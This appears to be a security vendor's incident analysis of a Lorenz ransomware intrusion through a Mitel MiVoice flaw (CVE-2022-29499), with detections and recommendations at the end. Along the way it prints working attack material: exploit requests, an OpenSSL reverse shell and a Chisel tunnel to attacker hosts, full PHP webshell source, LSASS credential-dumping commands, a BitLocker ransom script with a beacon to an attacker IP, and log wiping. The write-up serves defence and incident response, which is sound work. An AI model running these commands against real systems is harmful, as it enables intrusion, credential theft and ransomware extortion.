Chiseling In: Lorenz Ransomware Group Cracks MiVoice And Calls Back For Free

Key Takeaways

• Arctic Wolf Labs assesses with medium confidence that the Lorenz ransomware group exploited CVE-2022-29499 to compromise Mitel MiVoice Connect to gain initial access
• Lorenz waited nearly a month after obtaining initial access to conduct additional activity
• Lorenz exfiltrated data via FileZilla
• Encryption was done via BitLocker and Lorenz ransomware on ESXi
• Lorenz employed a high degree of Operational Security (OPSEC)
• Ransomware groups continue to use Living Off the Land Binaries (LOLBins) and gaining access to 0day exploits
• Process and PowerShell Logging can significantly aid incident responders and potentially help decrypt encrypted files

Background

The Arctic Wolf Labs team recently investigated a Lorenz ransomware intrusion, which leveraged a Mitel MiVoice VoIP appliance vulnerability (CVE-2022-29499) for initial access and Microsoft’s BitLocker Drive Encryption for data encryption. Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems. Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico.

Monitoring just critical assets is not enough for organizations, security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices. Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection. In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected.

Technical Analysis

Initial Access

Initial malicious activity originated from a Mitel appliance sitting on the network perimeter. Lorenz exploited CVE-2022-29499, a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used Chisel as a tunnelling tool to pivot into the environment.

In late-June, researchers at CrowdStrike published a blog article detailing the vulnerability and a suspected ransomware intrusion attempt leveraging it for initial access. Although post-exploitation details were limited, Arctic Wolf Labs observed significant overlap in the reported Tactics, Techniques, and Procedures (TTPs) tied to initial access.

The following GET requests were observed, leading to successful exploitation of CVE-2022-29499:

"GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:137.184.181[.]252/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 42
"GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:137.184.181[.]252/$PWD|sh|? HTTP/1.0" 200

After successful exploitation, the threat actors leveraged cURL to download a shell script called wc2_deploy

GET //shoretel/wc2_deploy HTTP/1.1 
User-Agent: curl/7.29.0 
Host: 137.184.181.252 
Accept: */*

The wc2_deploy shell script, when executed, establishes an SSL-encrypted reverse shell using living-off-the-land techniques via the mkfifo command and OpenSSL.

mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1| 
openssl s_client -quiet -connect 137.184.181[.]252:443 > /tmp/.svc_bkp_1; 
rm /tmp/.svc_bkp_1

A packet capture demonstrated that the reverse shell established on 137.184.181[.]252:443 was a ncat SSL listener.

<SNIP>
`0...localhost0K..`.H...B.
.>.<Automatically generated by Ncat. See https://nmap.org/ncat/.0
</SNIP>

Post-Exploitation Activity

Once a reverse shell was established, the threat actors made use of the Mitel device’s command line interface (stcli) to create a hidden directory and proceeded to download a compiled binary of the open source TCP tunneling tool Chisel directly from Github via wget. The threat actors renamed the Chisel binary to mem, unzipped it, and then executed it to establish a connection back to a Chisel server listening at hxxps[://]137.184.181[.]252[:]8443, skipping TLS certificate verification and turning the client into a SOCKS proxy for the threat actor.

stcli  
su  
mkdir /tmp/.coreDump/ && cd /tmp/.coreDump/ && wget https://github.com/jpillora/chisel/rel 
eases/download/v1.7.6/chisel_1.7.6_linux_386.gz -O /tmp/.coreDump/mem.gz && gzip -d /tmp/ 
.coreDump/mem.gz && chmod 777 /tmp/.coreDump/mem && /tmp/.coreDump/mem client 
--tls-skip-verify --fingerprint '<Redacted>' https://137.184.181[.]252:8443 R:socks & exit

Persistence

It is worth noting that, after exploitation of the Mitel device, Lorenz did not immediately proceed with any further activity for about a month. Upon returning to the Mitel device, the threat actors interacted with a webshell named pdf_import_export.php located in the path /vhelp/pdf/en/. The webshell expects a triple base64 encoded command sent via POST request.

<?php if(isset($_POST["ucba"])){try { $kka=$_POST["ucba"];
$lalldl=base64_decode(base64_decode(base64_decode($kka)));
$handle = popen("$lalldl 2>&1", "r");
$read = fread($handle, 2096);
echo base64_encode(base64_encode(base64_encode($read)))."|\n"
;pclose($handle); } catch (Exception $e) {}; };?>

 

We have medium confidence that the webshell was placed onto the device during the initial exploitation. This is based on no additional exploitation activity being observed upon returning to the Mitel device.

Shortly after interacting with the webshell, we observed the Mitel device initiate a reverse shell and Chisel tunnel again. This time using 138.68.59[.]16[:]443 for the SSL ncat reverse shell and hxxps[://]138.68.59[.]16[:]8443 for Chisel. Lorenz went on to leverage Chisel’s SOCKS functionality to pivot into the victim’s network.

Credential Access

The threat actors relied heavily on CrackMapExec for follow-on activity through the SOCKS tunnel.

CrackMapExec was first used to dump credentials remotely via comsvcs, implemented via the lsassy module. The module first identifies the PID of the Local Security Authority Subsystem Service (LSASS) and then creates a full LSASS memory dump.

CmD.eXe /Q /c for /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" 
| find \"lsass\"\"') 
do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B \\Windows\\Temp\\kMekF.dbf full

Investigating PowerShell logs we identified that this activity was quickly followed by Out-Minidump which abuses Windows Error Reporting to dump LSASS memory and is like comsvcs, implemented in CrackMapExec as part of the lsassy module.

powErsHeLl.eXE -NoP $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
;$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic');
$Flags = [Reflection.BindingFlags] 'NonPublic, Static';
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags);
$ProcessDumpPath = '\Windows\Temp\bSpRLV.tar';
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create);
$p=Get-Process lsass;
$Result = $MiniDumpWriteDump.Invoke($null, @($p.Handle,$p.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
;$FileStream.Close()

Discovery

After dumping credentials, the threat actor began network and domain enumeration activity. They first leveraged certutil to identify the Active Directories Certificate Authorities (CA) registered within the forest and the server hosting the service.

certutil --config - -ping

netsh was then used to display the firewall status immediately followed by ipconfig to display the TCP/IP configuration for all adapters followed by netstat to enumerate all active TCP connections.

netsh advfirewall show allprofiles state
ipconfig /all
netstat -anp tcp

The threat actors searched through compromised device directories looking for passwords by doing a recursive listing of file contents and leveraging the Windows command findstr.

cmd.exe /C Dir /s/b E:\\<REDACTED\\ |findstr passw

Additionally the threat actors checked for running instances of PowerShell.

cmd.exe /C tasklist /v | findstr PowerShell.exe

Privilege Escalation and Lateral Movement

Lorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one with domain admin privileges. These accounts were used to move laterally through the environment via RDP and subsequently to a domain controller.

Exfiltration

Prior to beginning encryption, the threat actors leveraged the compromised administrator accounts to install FileZilla. FileZilla was then used to exfiltrate data via SSH on port 22 to one of the following IP addresses:

Encryption

Lorenz leveraged Microsoft’s BitLocker Drive Encryption by creating a file called worm.txt and then executing the file on the domain controller remotely via atexec.

cmd.exe /C powershell.exe Get-Content C:\\<Redacted>\worm.txt| PowerShell.exe -noprofile - > C:\\Windows\Temp\dlGjphUt.tmp 2>&1

Through existing PowerShell logging we identified the contents of worm.txt, which contained PowerShell code to obtain a list of all computers and then remotely create a scheduled task named network. The scheduled task would obtain the contents from \\<REDACTED-DOMAIN>\NETLOGON\security_watermark.jpg and immediately run, starting the encryption process.

$cred = New-Object System.Management.Automation.PSCredential ('<REDACTED-DOMAIN>\<REDACTED-USER>', $password);$comp=Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select ds_cn;$comp= $comp | Sort-Object {Get-Random;}Foreach ($c in $comp){Invoke-Command -ComputerName $c.ds_cn -Credential $cred -ScriptBlock {SCHTASKS /CREATE /F /ru 'SYSTEM' /SC ONLOGON /TN 'network' /TR 'powershell.exe Get-Content \\<REDACTED-DOMAIN>\NETLOGON\security_watermark.jpg | PowerShell.exe -noprofile -';SCHTASKS /Run /TN 'network'} -AsJob;}

Because of the sensitivity we can only provide some parts of network   (which is actually a PowerShell script, not a jpeg image).

The first portion of network adds multiple keys to the registry via the reg add command to prepare the devices for BitLocker encryption. The key RecoveryKeyMessage contained the unique Lorenz ransomware Tor URL to conduct negotiations between the threat actor and victim. The BitLocker recovery message would then be displayed on the pre-boot key recovery screen after the device was encrypted.

REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPM /t REG_DWORD /d 2 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKey /t REG_DWORD /d 2 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v RecoveryKeyMessage /t REG_SZ /d 'http://<REDACTED-LORENZ-LINK.ONION>' /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f;
REG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f;

Note: In some instances the reg add command would fail if HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE does not exist, inhibiting encryption on some devices.

Next security_watermark.jpg attempts to install BitLocker, including all role services and applicable management tools, via the Install-WindowsFeature cmdlet. This was followed by enabling BitLocker via the PowerShell cmdlet enable-BitLocker.

Install-WindowsFeature BitLocker -IncludeAllSubFeature -IncludeManagementTools -Restart;"enable-BitLocker -EncryptionMethod Aes256 -password(ConvertTo-SecureString [REDACTED PASSWORD] -AsPlainText -Force) -mountpoint D: -PasswordProtector -skiphardwaretest -UsedSpaceOnly"

Note the -password parameter contains an $UnsecurePassword string. Capturing the plaintext password allowed the victim to decrypt nearly 95% of their encrypted endpoints.

The threat actors kept track of the encryption progress by sending an HTTP POST request to hxxp://206.188.197[.]125 (one of the IP addresses used for data exfiltration) via the Invoke-WebRequest. The POST request included the encryption progress displayed as a percentage.

Invoke-WebRequest -Uri hxxp://206.188.197[.]125/ -Method POST -Body ($postParams| ConvertTo-Json);Write-Progress -Activity 'Encrypting volume $($<variable>.MountPoint)' -Status 'Encryption Progress:' -PercentComplete $<variable>.EncryptionPercentage;

After the encryption process the script clears all event logs.

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

Although Lorenz primarily leveraged BitLocker for encryption, we observed a select few ESXi hosts with Lorenz ransomware.

Recommendations

Upgrade to MiVoice Connect Version R19.3

In July 2022, Mitel released MiVoice Connect version R19.3, which fully remediates CVE-2022-29499. We recommend upgrading to version R19.3 to prevent potential exploitation of this vulnerability. On April 19, 2022, Mitel provided a script for releases 19.2 SP3 and earlier, and R14.x and earlier as a workaround before the release of R19.3.

Note: Arctic Wolf recommends following change management best practices for deploying security patches, including testing changes in a dev environment before deploying to production to avoid operational impact.

Scan External Appliances and Web Applications

External scans are an integral part in assessing your organization’s footprint and hardening your environment and security posture. You cannot protect assets that you do not know about and external scans can help your organization discover those assets. Furthermore, external scans can help define an organization’s attack surface across devices exposed to the Internet.

Do Not Expose Critical Assets Directly to the Internet

Upon reviewing external scan results, ensure critical assets are not directly exposed to the Internet. If a device does not need to be on the perimeter, remove it. Removing a device from your network perimeter will reduce your organization’s attack surface.

Configure PowerShell Logging

Arctic Wolf Labs is continuously investigating attacks in which PowerShell was used extensively throughout all phases of the attack. We recommend to turn on Module Logging, Script Block Logging, and Transcription Logging and send logs to a centralised logging solution

Configure Off-Site Logging

Always ensure that critical assets are monitored and that captured logs are stored externally to your organization. Otherwise, detailed forensic analysis options may be limited when threat actors take evasive actions to hide their tracks.

Backups

Establish a tested online – offline backup strategy for data as well as gold images and identify weak points a threat actor might exploit. Saving just one backup file will not be enough to ensure your data is protected and recoverable.

Limit the Blast Radius of Potential Attacks

To limit the amount of damage that would be inflicted in a potential attack, privileged credentials should never be exposed on lower-tier assets. By adhering to this principle, the likelihood that a threat actor would be able to successfully gain access to a domain controller is reduced. Implementing logical network segmentation based on privileges limits a threat actor’s ability to move laterally (e.g., restricting domain administrators from logging into workstations).

Detections

Network Detections

Arctic Wolf Labs has created custom Suricata rules to aid in identification of the malicious activity described in this blog.

The rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-suricata.rules
The following Snort signatures available in Emerging Threats’ ET Community ruleset can also be used to detect relevant activity:

• 2037121 — ET EXPLOIT: Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)
• 2001980 — ET POLICY: SSH Client Banner Detected on Unusual Port

Endpoint Detections

Arctic Wolf Labs has created custom Yara rules to aid in identification of the malicious activity described in this blog.

The rules can be downloaded here: https://github.com/rtkwlf/wolf-tools/threat-intelligence/lorenz-ransomware-chiseling-in/lorenz-yara.yar

The following SIGMA rules shared by SigmaHQ can detect numerous endpoint TTPs used by Lorenz

• Process Dump via Comsvcs DLL
• Accessing WinAPI in PowerShell for Credentials Dumping
• Remote Task Creation via ATSVC Named Pipe
• PowerShell as a Service in Registry
• CrackMapExec Process Patterns
• Encoded PowerShell Command Line Usage of ConvertTo-SecureString

Indicators of Compromise

Note: A full copy of these IOCs can be downloaded as a CSV file here

 

ATT&CK Matrix

References

https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002

https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/

By Markus Neis, Ross Phillips, Steven Campbell, Teresa Whitmore, Alex Ammons, and Arctic Wolf Labs Team

Markus Neis 

Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks. 

Ross Phillips 

Ross is a Sr. Threat Intelligence Researcher at Arctic Wolf Labs with almost a decade of experience in the security landscape. Prior to this, Ross worked as a Technical Lead for the Arctic Wolf SOC and an Internal Tech Resident at Google after graduating from Rochester Institute of Technology in 2012 majoring in Information Security & Forensics. 

Steven Campbell 

Steven Campbell is a Threat Intelligence Researcher at Arctic Wolf Labs and has more than eight years of experience in intelligence analysis and security research. He has a strong background in infrastructure analysis and adversary tradecraft. 

Teresa Whitmore 

Teresa Whitmore is a Forensic Analyst at Tetra Defense, an Arctic Wolf company, focused on leading incident response and digital forensic investigations. She has more than a decade of combined experience in DFIR, cyber defense operations, and malware analysis. 

Alex Ammons 

Alex Ammons is a forensics analyst at Tetra Defense, an Arctic Wolf company, and has numerous certifications and operational experience from the Department of Defense and National Security Agency. Alex is seasoned in incident response and offensive and defensive cyber operations.